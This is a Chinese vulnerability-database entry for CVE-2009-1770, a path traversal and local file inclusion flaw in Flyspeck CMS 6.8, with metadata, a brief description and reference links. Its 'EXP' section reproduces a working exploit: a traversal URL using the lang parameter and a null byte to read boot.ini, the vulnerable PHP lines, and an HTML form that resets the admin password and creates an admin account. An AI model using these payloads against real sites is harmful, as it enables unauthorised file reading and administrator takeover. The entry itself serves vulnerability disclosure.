Flyspeck CMSi 'ncludes/database/examples/addressbook.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117792 漏洞类型 路径遍历
发布时间 2009-05-18 更新时间 2009-06-09
CVE编号 CVE-2009-1770 CNNVD-ID CNNVD-200905-291
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8714
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-291
|漏洞详情
FlyspeckCMS是简单易用的网站编辑系统。FlyspeckCMS6.8版本的includes/database/examples/addressbook.php中存在目录遍历漏洞。远程攻击者可以借助lang参数中的一个..,包含和允许任意本地文件。
|漏洞EXP
=-=-remote change add admin xpl/lfi-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::Flyspeck CMS 6.8
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.flyspeck.net/purchase/download_trial.php
--------------------------------------------------
lfi:
includes/database/examples/addressbook.php?lang=../../../../boot.ini%00

$lang = isset($_GET['lang']) ? $_GET['lang'] : 'de'; line 28
include "lang." . $lang . ".inc"; line 29
--------------------------

change pass and add admin:


<h2>coded by ahmadbady</h2>
<form name="editUser" action="/flyspeck/index.php?event=updateExistingContent" 
onsubmit="return validateForm(this)" method="post" 
enctype="multipart/form-data"><label name="Name">Name</label>
<input type="text" name="users[fullname]" value="admin" />
<label name="Email">Email</label><input type="text" name="users[email]" value="admin" />
<label name="Role">Role</label><select name="users[role_id]"><option value="1" label="admin" />
</select><label name="Username">Username</label><input type="text" name="users[username]" value="admin" />
<label name="Password">Password</label><input type="text" name="users[password]" value="admin" />
<input type="hidden" name="id" value="1" /><input type="hidden" name="defName" value="users" />
<input type="submit" name="1" value="Save" /></form>

# milw0rm.com [2009-05-18]
|参考资料

来源:VUPEN
名称:ADV-2009-1367
链接:http://www.vupen.com/english/advisories/2009/1367
来源:BID
名称:35011
链接:http://www.securityfocus.com/bid/35011
来源:MILW0RM
名称:8714
链接:http://www.milw0rm.com/exploits/8714